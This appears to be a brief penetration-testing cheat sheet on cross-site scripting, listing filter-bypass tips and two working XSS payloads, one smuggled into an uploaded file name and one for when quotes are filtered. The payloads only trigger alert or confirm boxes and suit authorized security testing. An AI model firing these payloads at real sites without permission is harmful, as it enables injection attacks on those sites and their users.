Cross-Site Scripting Testing
* If script tags are banned, use <h1> and other HTML tags
* Upload file using '"><img src=x onerror=alert(document.domain)>.txt
* if " are filtered then use this payload /><img src=d onerror=confirm(/alert/);>Last updated